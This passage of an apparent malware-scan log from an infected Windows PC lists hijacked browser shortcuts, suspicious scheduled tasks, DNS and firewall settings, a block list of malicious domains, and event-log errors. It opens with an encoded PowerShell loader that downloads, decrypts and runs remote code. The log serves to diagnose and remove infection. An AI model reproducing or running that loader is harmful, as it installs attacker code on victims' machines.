AOQBBAGgAaQBWADEAVAA2AFcANQBEADgATABFAHkAQgBNAGkAegBnADYAdQBsAC0ARwAtAE4ARAB0AGUAaQAzAG4AZAAwAEMAXwBMAFYAMgBQAEYAcQAxAFoAMQBoAFEAbQBzAEEAOABVAEwAdQBiAF8ANwBiAHEASQBPAHIAeAB5AFkAWAB0AFIAMABwAHYAUQBvAFgAZAB3AFcAMQBKAHoAWABWAE0ASQBRAFkAMwA3AFYAeABDAHoAZAA0AHkAYQAyAHgAUwBhAHIAbgBhAEcAagBWAC0ASgA4AFcASgAyAEkAUQBLAF8AegBMAGEASAAtAFMASwBWAFoAMwBXAFEAbwA0ADIAZQBfAFQAOAB1ADcAcwBEAGQAcgBlAE0AMgBDAHMARwB6AE4ARABzAG8AcwBDAGEAOQBLADIAZwBpADgAVABKAEcAXwBPAHkAbgA1AHAAVABzADUAcwBlAHoAOQB5AFUASQBkAGcAVgBlAGUAZgA4AGsAQgA0ADEAcwBOADcAUQBtAE0ATABsAHcAegBXAHQATQByAGcAcABMAGUATgBLAHoAUABkADMAegA3AEsAQQBCADUAQgBIAFIASAB0AEsAMQByAFkAOAA3AHcAMQBlADUANgBMAFkAVQBaAHgAVwBjAEoAQwBNADAATAAzAFAAMwB0AFEAdQB0AFMAdwB5AFoAdwBMAGkALQBmAGsANgAxAFEAeAAwAGwAMwBWAFYAXwBUAE8AYgBWAGYAJgByAD0ANwA3ADEAOQA4ADcAOQA5ADMAMAAyADMANQA3ADEAMwAwADUAMQAiADsAJABzAHQAcwBrAD0AIgB7ADAARgAwAEYANwBEADQANwAtADcARQAwADgALQA3AEQAMABCAC0ANwA4ADEAMQAtADcARAAwAEMAMAA1ADAAQgAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIAWABRAFUATwAyAFkAVwBZACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
Task: {9BA7BA7E-1533-4B35-ABFE-16D2D5009E73} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-01-16] (Synaptics Incorporated)
Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION
Task: {F61341FC-B312-4A23-8F26-9CB5191CF5BF} - System32\Tasks\SushiLeads => C:\Program Files (x86)\sushileads\ScheduledTask.exe
Task: {F911CADE-3A34-4F78-B0C3-0F67C227D535} - System32\Tasks\Dell\Dell Product Registration => /boot /LSRC=autolaunch
Task: {F93F7DEF-97E1-4486-951F-083F68C4E7B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2015-10-29] (PC-Doctor, Inc.)
Task: {FB55E3BB-58E9-4918-98BC-AE9BBBD84928} - System32\Tasks\ASC8_SkipUac_hersheychoco9 => D:\Utilities\Advanced SystemCare 8\ASC.exe [2015-06-16] (IObit)
Task: {FC206518-4BBD-4AAE-92C6-10454002C453} - System32\Tasks\Uninstaller_SkipUac_hersheychoco9 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-05-20] (IObit)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job => D:\Utilities\Advanced SystemCare 8\ASC.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic

==================== Loaded Modules (Whitelisted) ==============

2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ () C:\Windows\system32\Comvud64.dll
2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2015-04-16 16:55 - 2014-08-19 13:12 - 01356568 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
2015-12-28 23:08 - 2015-12-22 12:03 - 00342016 _____ () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
2014-09-18 13:37 - 2014-07-02 21:55 - 00487144 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
2015-09-21 21:29 - 2014-10-16 09:26 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00028160 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00012800 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
2015-12-28 23:04 - 2015-12-28 23:04 - 00011264 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\{A2C49E11-7252-8301-FEB0-5D3FFF9EA4C3}.dat
2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-09-21 21:29 - 2013-01-15 17:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
2015-09-21 21:29 - 2013-01-15 17:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
2015-09-21 21:29 - 2013-01-15 17:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
2014-05-13 21:32 - 2013-12-18 11:53 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2014-09-18 13:37 - 2014-07-30 17:37 - 01906464 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2014-05-13 21:40 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2014-09-18 13:37 - 2012-11-25 23:19 - 00117608 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
2015-12-16 21:07 - 2015-12-10 21:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 21:07 - 2015-12-10 21:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Roboscan_UpdSrv => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Roboscan_UpdSrv => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100sexlinks.com -> 100sexlinks.com

There are 4788 more sites.


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2015-12-29 14:05 - 00000831 ____A C:\Windows\system32\Drivers\etc\hosts

# ::1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DNS Servers: 208.87.151.17 - 208.87.151.16
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 0) (EnableLUA: 1)
Windows Firewall is disabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "BTMTrayAgent"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "BrowserAppCoreService"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "AvastUI.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_DF36D0F5D36790FB776196B8BD1F923B"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "Advanced SystemCare 8"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{3358EEB9-BF63-4965-BB07-5D87F8455602}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{24B1F9F1-7C3F-41AA-A61E-0509379FACD8}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{1C03B25A-7B58-455E-9B0B-E52E038D3A25}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{D776EB9A-C2A3-41DE-BC72-EFF3929CC640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{7D3C883A-AEBC-4F58-991D-26810ACBFD9A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C81A2B31-CC74-4C27-A3FF-2BACD2DD09C3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{B861BA79-6EB3-4518-85BA-3C4F495C531B}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
FirewallRules: [{8A96865D-D43C-464C-B756-000B93387C90}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse

==================== Restore Points =========================

09-12-2015 13:27:06 Windows Update
17-12-2015 20:05:00 Scheduled Checkpoint
25-12-2015 18:53:48 Scheduled Checkpoint
28-12-2015 23:12:21 PCAcceleratePro restore point
29-12-2015 00:03:18 Restore Operation
29-12-2015 16:00:38 Windows Modules Installer

==================== Faulty Device Manager Devices =============

 

[hersheychoco]

==================== Event log errors: =========================

Application errors:
==================
Error: (01/05/2016 04:51:26 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

Error: (12/29/2015 05:15:24 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

Error: (12/29/2015 05:06:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_PNRPsvc, version: 6.3.9600.17415, time stamp: 0x54504177
Faulting module name: ntdll.dll, version: 6.3.9600.18146, time stamp: 0x5650b9bb
Exception code: 0xc0000005
Fault offset: 0x000000000003dcfe
Faulting process id: 0x16b8
Faulting application start time: 0xsvchost.exe_PNRPsvc0
Faulting application path: svchost.exe_PNRPsvc1
Faulting module path: svchost.exe_PNRPsvc2
Report Id: svchost.exe_PNRPsvc3
Faulting package full name: svchost.exe_PNRPsvc4
Faulting package-relative application ID: svchost.exe_PNRPsvc5

Error: (12/29/2015 04:40:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: CHOCOYAUTJA)
Description: Activation of app windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel failed with error: -2144927151 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (12/29/2015 04:27:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x1374
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3
Faulting package full name: mbam.exe4
Faulting package-relative application ID: mbam.exe5

Error: (12/29/2015 04:26:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
Exception code: 0x40000015
Fault offset: 0x0008d6fd
Faulting process id: 0x132c
Faulting application start time: 0xmbam.exe0
Faulting application path: mbam.exe1
Faulting module path: mbam.exe2
Report Id: mbam.exe3
Faulting package full name: mbam.exe4
Faulting package-relative application ID: mbam.exe5

Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\Users\">.

Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\ProgramData\Microsoft\Windows\Start Menu\">.

Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)

Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)


System errors:
=============
Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (01/05/2016 04:50:12 PM) (Source: Server) (EventID: 2505) (User: )
Description: The server could not bind to the transport \Device\NetBT_Tcpip_{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} because another computer on the network has the same name. The server could not start.

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The WajaNetEn Monitor service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Update Simple for You service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SushiLeadsUpdaterService service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Network Protocols Adapter service failed to start due to the following error:
%%3

Error: (01/05/2016 04:48:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Advanced SystemCare Service 8 service failed to start due to the following error:
%%2

Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.

Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
this computer.


CodeIntegrity:
===================================
Date: 2016-01-05 17:09:53.308
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Robo\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-05 17:02:18.858
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-01-05 16:48:30.085
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 17:12:39.077
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:50:33.362
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:49:14.547
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:49:14.406
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 15:35:20.347
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 14:36:36.069
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2015-12-29 14:29:07.156
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4210U CPU @ 1.70GHz
Percentage of memory in use: 31%
Total physical RAM: 6024.96 MB
Available physical RAM: 4155.91 MB
Total Virtual: 6984.96 MB
Available Virtual: 4856.89 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:920.08 GB) (Free:678.4 GB) NTFS
Drive d: (TRAVELDRIVE) (Removable) (Total:7.2 GB) (Free:2.74 GB) FAT32
Drive x: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.29 GB) NTFS
Drive y: (PBR Image) (Fixed) (Total:10.05 GB) (Free:0.71 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 5AA0DE3C)

